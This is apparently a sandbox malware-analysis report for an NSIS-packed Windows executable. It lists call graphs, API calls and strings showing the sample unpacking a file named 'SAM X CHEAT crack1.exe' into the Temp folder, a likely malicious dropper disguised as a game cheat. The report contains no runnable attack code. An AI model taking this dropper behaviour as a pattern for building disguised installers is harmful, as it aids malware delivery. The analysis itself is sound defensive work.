2874->2867 2874->2869 2875 402f77 GetTickCount 2875->2876 2876->2867 2876->2870 2876->2875 2877 402f9c MulDiv wsprintfA 2876->2877 2878 402fda WriteFile 2876->2878 2879 404e8d 25 API calls 2877->2879 2878->2867 2878->2876 2879->2876 2880->2826 2881->2827 2883 401772 lstrcatA 2882->2883 2884 4056ae lstrcatA 2882->2884 2883->2826 2884->2883 2886 405eb2 FindClose 2885->2886 2887 405ebd 2885->2887 2886->2887 2887->2831 2889 405875 2888->2889 2890 405868 SetFileAttributesA 2888->2890 2889->2833 2890->2889 2892 405477 2891->2892 2893 4054c3 2892->2893 2894 40548b MessageBoxIndirectA 2892->2894 2893->2833 2894->2893 2896 402ec0 2895->2896 2896->2865 2896->2866 2896->2867 2897->2861 4058 401634 4059 402a0c 18 API calls 4058->4059 4060 40163a 4059->4060 4061 405e9c 2 API calls 4060->4061 4062 401640 4061->4062 4063 401934 4064 4029ef 18 API calls 4063->4064 4065 40193b 4064->4065 4066 4029ef 18 API calls 4065->4066 4067 401945 4066->4067 4068 402a0c 18 API calls 4067->4068 4069 40194e 4068->4069 4070 401961 lstrlenA 4069->4070 4074 40199c 4069->4074 4071 40196b 4070->4071 4071->4074 4076 405ba1 lstrcpynA 4071->4076 4073 401985 4073->4074 4075 401992 lstrlenA 4073->4075 4075->4074 4076->4073 4077 4019b5 4078 402a0c 18 API calls 4077->4078 4079 4019bc 4078->4079 4080 402a0c 18 API calls 4079->4080 4081 4019c5 4080->4081 4082 4019cc lstrcmpiA 4081->4082 4083 4019de lstrcmpA 4081->4083 4084 4019d2 4082->4084 4083->4084 4085 402036 4086 402a0c 18 API calls 4085->4086 4087 40203d 4086->4087 4088 402a0c 18 API calls 4087->4088 4089 402047 4088->4089 4090 402a0c 18 API calls 4089->4090 4091 402050 4090->4091 4092 402a0c 18 API calls 4091->4092 4093 40205a 4092->4093 4094 402a0c 18 API calls 4093->4094 4095 402064 4094->4095 4096 402078 CoCreateInstance 4095->4096 4097 402a0c 18 API calls 4095->4097 4100 402097 4096->4100 4101 40214d 4096->4101 4097->4096 4098 401423 25 API calls 4099 40217f 4098->4099 4100->4101 4102 40212c MultiByteToWideChar 4100->4102 4101->4098 4101->4099 4102->4101 4103 4014b7 4104 4014bd 4103->4104 4105 401389 2 API calls 4104->4105 4106 4014c5 4105->4106 4107 402239 4108 402241 4107->4108 4109 402247 4107->4109 4111 402a0c 18 API calls 4108->4111 4110 402257 4109->4110 4112 402a0c 18 API calls 4109->4112 4113 402265 4110->4113 4114 402a0c 18 API calls 4110->4114 4111->4109 4112->4110 4115 402a0c 18 API calls 4113->4115 4114->4113 4116 40226e WritePrivateProfileStringA 4115->4116 4117 40243d 4118 402b16 19 API calls 4117->4118 4119 402447 4118->4119 4120 4029ef 18 API calls 4119->4120 4121 402450 4120->4121 4122 402473 RegEnumValueA 4121->4122 4123 402467 RegEnumKeyA 4121->4123 4125 402672 4121->4125 4124 40248c RegCloseKey 4122->4124 4122->4125 4123->4124 4124->4125 4127 4022bd 4128 4022c2 4127->4128 4129 4022ed 4127->4129 4131 402b16 19 API calls 4128->4131 4130 402a0c 18 API calls 4129->4130 4132 4022f4 4130->4132 4133 4022c9 4131->4133 4138 402a4c RegOpenKeyExA 4132->4138 4134 402a0c 18 API calls 4133->4134 4137 40230a 4133->4137 4136 4022da RegDeleteValueA RegCloseKey 4134->4136 4136->4137 4140 402a77 4138->4140 4146 402ac3 4138->4146 4139 402a9d RegEnumKeyA 4139->4140 4141 402aaf RegCloseKey 4139->4141 4140->4139 4140->4141 4143 402ad4 RegCloseKey 4140->4143 4144 402a4c 5 API calls 4140->4144 4142 405f2d 5 API calls 4141->4142 4145 402abf 4142->4145 4143->4146 4144->4140 4145->4146 4147 402aef RegDeleteKeyA 4145->4147 4146->4137 4147->4146

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 0 40310d-403141 SetErrorMode GetVersion 1 403143-40314b call 405f2d 0->1 2 403154-4031e4 call 405ec3 * 3 call 405f2d * 2 #17 OleInitialize SHGetFileInfoA call 405ba1 GetCommandLineA call 405ba1 GetModuleHandleA 0->2 1->2 7 40314d 1->7 20 4031f0-403205 call 4056bf CharNextA 2->20 21 4031e6-4031eb 2->21 7->2 24 40326a-40326e 20->24 21->20 25 403270 24->25 26 403207-40320a 24->26 29 403283-40329b GetTempPathA call 4030dc 25->29 27 403212-40321a 26->27 28 40320c-403210 26->28 31 403222-403225 27->31 32 40321c-40321d 27->32 28->27 28->28 38 4032bd-4032d4 DeleteFileA call 402c38 29->38 39 40329d-4032bb GetWindowsDirectoryA lstrcatA call 4030dc 29->39 33 403227-40322b 31->33 34 40325a-403267 call 4056bf 31->34 32->31 36 40323b-403241 33->36 37 40322d-403236 33->37 34->24 51 403269 34->51 43 403251-403258 36->43 44 403243-40324c 36->44 37->36 41 403238 37->41 52 40333b-40334a ExitProcess CoUninitialize 38->52 53 4032d6-4032dc 38->53 39->38 39->52 41->36 43->34 49 403272-40327e call 405ba1 43->49 44->43 48 40324e 44->48 48->43 49->29 51->24 57 403350-403360 call 405462 ExitProcess 52->57 58 40345f-403465 52->58 55 40332b-403332 call 4035f4 53->55 56 4032de-4032e7 call 4056bf 53->56 65 403337 55->65 71 4032f2-4032f4 56->71 59 403502-40350a 58->59 60 40346b-403488 call 405f2d * 3 58->60 66 403510-403514 ExitProcess 59->66 67 40350c 59->67 88 4034d2-4034e0 call 405f2d 60->88 89 40348a-40348c 60->89 65->52 67->66 72 4032f6-403300 71->72 73 4032e9-4032ef 71->73 75 403302-40330f call 405775 72->75 76 403366-40337a call 4053e9 lstrcatA 72->76 73->72 78 4032f1 73->78 75->52 87 403311-403327 call 405ba1 * 2 75->87 85 403387-4033a1 lstrcatA lstrcmpiA 76->85 86 40337c-403382 lstrcatA 76->86 78->71 85->52 91 4033a3-4033a6 85->91 86->85 87->55 99 4034e2-4034ec 88->99 100 4034ee-4034f9 ExitWindowsEx 88->100 89->88 93 40348e-403490 89->93 95 4033a8-4033ad call 40534f 91->95 96 4033af call 4053cc 91->96 93->88 98 403492-4034a4 GetCurrentProcess 93->98 107 4033b4-4033c1 SetCurrentDirectoryA 95->107 96->107 98->88 113 4034a6-4034c8 98->113 99->100 106 4034fb-4034fd call 40140b 99->106 100->59 100->106 106->59 111 4033c3-4033c9 call 405ba1 107->111 112 4033ce-4033e8 call 405ba1 107->112 111->112 118 4033ed-403409 call 405bc3 DeleteFileA 112->118 113->88 121 40344a-403451 118->121 122 40340b-40341b CopyFileA 118->122 121->118 124 403453-40345a call 4058ef 121->124 122->121 123 40341d-40343d call 4058ef call 405bc3 call 405401 122->123 123->121 133 40343f-403446 CloseHandle 123->133 124->52 133->121
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SetErrorMode.KERNELBASE ref: 00403131
                                                                                                                                                                                                                                                                                      • GetVersion.KERNEL32 ref: 00403137
                                                                                                                                                                                                                                                                                      • #17.COMCTL32(0000000B,0000000D,SETUPAPI,USERENV,UXTHEME), ref: 00403185
                                                                                                                                                                                                                                                                                      • OleInitialize.OLE32(00000000), ref: 0040318C
                                                                                                                                                                                                                                                                                      • SHGetFileInfoA.SHELL32(00429078,00000000,?,00000160,00000000), ref: 004031A8
                                                                                                                                                                                                                                                                                      • GetCommandLineA.KERNEL32(0042E440,NSIS Error), ref: 004031BD
                                                                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\EsgeCzT4do.exe",00000000), ref: 004031D0
                                                                                                                                                                                                                                                                                      • CharNextA.USER32(00000000,"C:\Users\user\Desktop\EsgeCzT4do.exe",00409188), ref: 004031FB
                                                                                                                                                                                                                                                                                      • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 0040328E
                                                                                                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004032A3
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032AF
                                                                                                                                                                                                                                                                                      • DeleteFileA.KERNELBASE(1033), ref: 004032C2
                                                                                                                                                                                                                                                                                        • Part of subcall function 00405F2D: GetModuleHandleA.KERNEL32(?,?,00000000,00403179,0000000D,SETUPAPI,USERENV,UXTHEME), ref: 00405F3F
                                                                                                                                                                                                                                                                                        • Part of subcall function 00405F2D: GetProcAddress.KERNEL32(00000000,?), ref: 00405F5A
                                                                                                                                                                                                                                                                                      • ExitProcess.KERNEL32(00000000), ref: 0040333B
                                                                                                                                                                                                                                                                                      • CoUninitialize.COMBASE(00000000), ref: 00403340
                                                                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00403360
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\EsgeCzT4do.exe",00000000,00000000), ref: 00403373
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00409148,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\EsgeCzT4do.exe",00000000,00000000), ref: 00403382
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\EsgeCzT4do.exe",00000000,00000000), ref: 0040338D
                                                                                                                                                                                                                                                                                      • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop), ref: 00403399
                                                                                                                                                                                                                                                                                      • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004033B5
                                                                                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(00428C78,00428C78,?,0042F000,?), ref: 004033FF
                                                                                                                                                                                                                                                                                      • CopyFileA.KERNEL32(C:\Users\user\Desktop\EsgeCzT4do.exe,00428C78,00000001), ref: 00403413
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00428C78,00428C78,?,00428C78,00000000), ref: 00403440
                                                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000006,00000005), ref: 00403499
                                                                                                                                                                                                                                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 004034F1
                                                                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00403514
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2046665771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2046518792.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047883595.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2048896177.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_EsgeCzT4do.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ExitFileProcesslstrcat$Handle$CurrentDeleteDirectoryModuleWindows$AddressCharCloseCommandCopyErrorInfoInitializeLineModeNextPathProcTempUninitializeVersionlstrcmpi
                                                                                                                                                                                                                                                                                      • String ID: $ /D=$ _?=$"$"C:\Users\user\Desktop\EsgeCzT4do.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\EsgeCzT4do.exe$Error launching installer$NCRC$NSIS Error$SETUPAPI$SeShutdownPrivilege$USERENV$UXTHEME$\Temp$~nsu
                                                                                                                                                                                                                                                                                      • API String ID: 2193684524-308789243
                                                                                                                                                                                                                                                                                      • Opcode ID: ab76eb2c2152f2e93327dec9938e6a45575b05374fc3fe47b3b7ec5c4186d2cd
                                                                                                                                                                                                                                                                                      • Instruction ID: 451575da7f46b68c591153a14feb1e54add6b468c03afba2ffefeba693a227d9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ab76eb2c2152f2e93327dec9938e6a45575b05374fc3fe47b3b7ec5c4186d2cd
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 55A1E3705083416AE7216F629C4AF6B7EACEB4570AF04047FF541B61D2CB7C9A058A6F

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 134 4035f4-40360c call 405f2d 137 403620-403647 call 405a88 134->137 138 40360e-40361e call 405aff 134->138 142 403649-40365a call 405a88 137->142 143 40365f-403665 lstrcatA 137->143 146 40366a-403693 call 4038bd call 405775 138->146 142->143 143->146 152 403699-40369e 146->152 153 40371a-403722 call 405775 146->153 152->153 154 4036a0-4036c4 call 405a88 152->154 158 403730-403755 LoadImageA 153->158 159 403724-40372b call 405bc3 153->159 154->153 164 4036c6-4036c8 154->164 162 4037e4-4037ec call 40140b 158->162 163 40375b-403791 RegisterClassA 158->163 159->158 177 4037f6-403801 call 4038bd 162->177 178 4037ee-4037f1 162->178 167 4038b3 163->167 168 403797-4037df SystemParametersInfoA CreateWindowExA 163->168 165 4036d9-4036e5 lstrlenA 164->165 166 4036ca-4036d7 call 4056bf 164->166 172 4036e7-4036f5 lstrcmpiA 165->172 173 40370d-403715 call 405694 call 405ba1 165->173 166->165 171 4038b5-4038bc 167->171 168->162 172->173 176 4036f7-403701 GetFileAttributesA 172->176 173->153 180 403703-403705 176->180 181 403707-403708 call 4056db 176->181 187 403807-403821 ShowWindow call 405ec3 177->187 188 40388a-403892 call 404f5f 177->188 178->171 180->173 180->181 181->173 195 403823-403828 call 405ec3 187->195 196 40382d-40383f GetClassInfoA 187->196 193 403894-40389a 188->193 194 4038ac-4038ae call 40140b 188->194 193->178 201 4038a0-4038a7 call 40140b 193->201 194->167 195->196 199 403841-403851 GetClassInfoA RegisterClassA 196->199 200 403857-403888 DialogBoxParamA call 40140b call 403544 196->200 199->200 200->171 201->178
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00405F2D: GetModuleHandleA.KERNEL32(?,?,00000000,00403179,0000000D,SETUPAPI,USERENV,UXTHEME), ref: 00405F3F
                                                                                                                                                                                                                                                                                        • Part of subcall function 00405F2D: GetProcAddress.KERNEL32(00000000,?), ref: 00405F5A
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(1033,0042A0C0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0C0,00000000,00000003,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\EsgeCzT4do.exe",00000000), ref: 00403665
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32( C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exe,?,?,?, C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exe,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A0C0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0C0,00000000,00000003,C:\Users\user\AppData\Local\Temp\), ref: 004036DA
                                                                                                                                                                                                                                                                                      • lstrcmpiA.KERNEL32(?,.exe), ref: 004036ED
                                                                                                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32( C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exe), ref: 004036F8
                                                                                                                                                                                                                                                                                      • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403741
                                                                                                                                                                                                                                                                                        • Part of subcall function 00405AFF: wsprintfA.USER32 ref: 00405B0C
                                                                                                                                                                                                                                                                                      • RegisterClassA.USER32 ref: 00403788
                                                                                                                                                                                                                                                                                      • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004037A0
                                                                                                                                                                                                                                                                                      • CreateWindowExA.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004037D9
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000005,00000000), ref: 0040380F
                                                                                                                                                                                                                                                                                      • GetClassInfoA.USER32(00000000,RichEdit20A,0042E3E0), ref: 0040383B
                                                                                                                                                                                                                                                                                      • GetClassInfoA.USER32(00000000,RichEdit,0042E3E0), ref: 00403848
                                                                                                                                                                                                                                                                                      • RegisterClassA.USER32(0042E3E0), ref: 00403851
                                                                                                                                                                                                                                                                                      • DialogBoxParamA.USER32(?,00000000,0040398A,00000000), ref: 00403870
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2046665771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2046518792.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047883595.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2048896177.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_EsgeCzT4do.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exe$"C:\Users\user\Desktop\EsgeCzT4do.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$B
                                                                                                                                                                                                                                                                                      • API String ID: 1975747703-233633391
                                                                                                                                                                                                                                                                                      • Opcode ID: 7435158fc53e05b7eb452c6009065ca08444211a86bae1cfffb41dd4ba7d39e0
                                                                                                                                                                                                                                                                                      • Instruction ID: 069ef0fb9a42e1b4956c000ddcdb280bce5473b1ca4ea0d36e0de5988d82752f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7435158fc53e05b7eb452c6009065ca08444211a86bae1cfffb41dd4ba7d39e0
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE61D8B16442007FD220AFA69C45F273A6CEB44749F44457FF940B32D1CA7DA9018A7E

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 208 402c38-402c86 GetTickCount GetModuleFileNameA call 405878 211 402c92-402cc0 call 405ba1 call 4056db call 405ba1 GetFileSize 208->211 212 402c88-402c8d 208->212 220 402cc6 211->220 221 402dad-402dbb call 402bd4 211->221 213 402e6a-402e6e 212->213 223 402ccb-402ce2 220->223 228 402e10-402e15 221->228 229 402dbd-402dc0 221->229 224 402ce4 223->224 225 402ce6-402ce8 call 403093 223->225 224->225 230 402ced-402cef 225->230 228->213 231 402dc2-402dd3 call 4030c5 call 403093 229->231 232 402de4-402e0e GlobalAlloc call 4030c5 call 402e71 229->232 234 402cf5-402cfc 230->234 235 402e17-402e1f call 402bd4 230->235 248 402dd8-402dda 231->248 232->228 259 402e21-402e32 232->259 238 402d78-402d7c 234->238 239 402cfe-402d12 call 405839 234->239 235->228 243 402d86-402d8c 238->243 244 402d7e-402d85 call 402bd4 238->244 239->243 257 402d14-402d1b 239->257 250 402d9b-402da5 243->250 251 402d8e-402d98 call 405f9c 243->251 244->243 248->228 254 402ddc-402de2 248->254 250->223 258 402dab 250->258 251->250 254->228 254->232 257->243 261 402d1d-402d24 257->261 258->221 262 402e34 259->262 263 402e3a-402e3f 259->263 261->243 265 402d26-402d2d 261->265 262->263 264 402e40-402e46 263->264 264->264 266 402e48-402e63 SetFilePointer call 405839 264->266 265->243 267 402d2f-402d36 265->267 270 402e68 266->270 267->243 269 402d38-402d58 267->269 269->228 271 402d5e-402d62 269->271 270->213 272 402d64-402d68 271->272 273 402d6a-402d72 271->273 272->258 272->273 273->243 274 402d74-402d76 273->274 274->243
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00402C49
                                                                                                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\EsgeCzT4do.exe,00000400), ref: 00402C65
                                                                                                                                                                                                                                                                                        • Part of subcall function 00405878: GetFileAttributesA.KERNELBASE(00000003,00402C78,C:\Users\user\Desktop\EsgeCzT4do.exe,80000000,00000003), ref: 0040587C
                                                                                                                                                                                                                                                                                        • Part of subcall function 00405878: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040589E
                                                                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\EsgeCzT4do.exe,C:\Users\user\Desktop\EsgeCzT4do.exe,80000000,00000003), ref: 00402CB1
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C42
                                                                                                                                                                                                                                                                                      • soft, xrefs: 00402D26
                                                                                                                                                                                                                                                                                      • Inst, xrefs: 00402D1D
                                                                                                                                                                                                                                                                                      • Error launching installer, xrefs: 00402C88
                                                                                                                                                                                                                                                                                      • C:\Users\user\Desktop, xrefs: 00402C93, 00402C98, 00402C9E
                                                                                                                                                                                                                                                                                      • "C:\Users\user\Desktop\EsgeCzT4do.exe", xrefs: 00402C38
                                                                                                                                                                                                                                                                                      • Null, xrefs: 00402D2F
                                                                                                                                                                                                                                                                                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E10
                                                                                                                                                                                                                                                                                      • C:\Users\user\Desktop\EsgeCzT4do.exe, xrefs: 00402C4F, 00402C5E, 00402C72, 00402C92
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2046665771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2046518792.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047883595.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2048896177.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_EsgeCzT4do.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                                                                                      • String ID: "C:\Users\user\Desktop\EsgeCzT4do.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\EsgeCzT4do.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                                                                                                                                                                                                      • API String ID: 4283519449-1275957819
                                                                                                                                                                                                                                                                                      • Opcode ID: 52dd5125f2beb4c5a01725ee1ecfb7cda6383a0ef784e60b7ebdc9a7c5e8d2b4
                                                                                                                                                                                                                                                                                      • Instruction ID: d5d64c7dde767481ec9b836f5bb8cc7fe4476435a14377af370c0b56c56fa9d6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 52dd5125f2beb4c5a01725ee1ecfb7cda6383a0ef784e60b7ebdc9a7c5e8d2b4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7B51D971901214ABDB219FA6DE89B9E7BB8FB40354F10413BF900B62D1D7BC9D418B9D

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 275 402e71-402e85 276 402e87 275->276 277 402e8e-402e97 275->277 276->277 278 402ea0-402ea5 277->278 279 402e99 277->279 280 402eb5-402ec2 call 403093 278->280 281 402ea7-402eb0 call 4030c5 278->281 279->278 285 402ec8-402ecc 280->285 286 40303e 280->286 281->280 288 402ed2-402f1b GetTickCount 285->288 289 403027-403029 285->289 287 403040-403041 286->287 292 40308c-403090 287->292 290 402f21-402f29 288->290 291 403089 288->291 293 40302b-40302e 289->293 294 40307e-403082 289->294 295 402f2b 290->295 296 402f2e-402f3c call 403093 290->296 291->292 299 403030 293->299 300 403033-40303c call 403093 293->300 297 403043-403049 294->297 298 403084 294->298 295->296 296->286 309 402f42-402f4b 296->309 302 40304b 297->302 303 40304e-40305c call 403093 297->303 298->291 299->300 300->286 308 403086 300->308 302->303 303->286 312 40305e-403071 WriteFile 303->312 308->291 311 402f51-402f71 call 40600a 309->311 318 402f77-402f8a GetTickCount 311->318 319 40301f-403021 311->319 314 403023-403025 312->314 315 403073-403076 312->315 314->287 315->314 317 403078-40307b 315->317 317->294 320 402f8c-402f94 318->320 321 402fcf-402fd3 318->321 319->287 324 402f96-402f9a 320->324 325 402f9c-402fcc MulDiv wsprintfA call 404e8d 320->325 322 403014-403017 321->322 323 402fd5-402fd8 321->323 322->290 328 40301d 322->328 326 402ffa-403005 323->326 327 402fda-402fee WriteFile 323->327 324->321 324->325 325->321 331 403008-40300c 326->331 327->314 330 402ff0-402ff3 327->330 328->291 330->314 333 402ff5-402ff8 330->333 331->311 334 403012 331->334 333->331 334->291
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00402ED8
                                                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00402F7F
                                                                                                                                                                                                                                                                                      • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402FA8
                                                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00402FB8
                                                                                                                                                                                                                                                                                      • WriteFile.KERNELBASE(00000000,00000000,004193F1,7FFFFFFF,00000000), ref: 00402FE6
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2046665771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2046518792.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
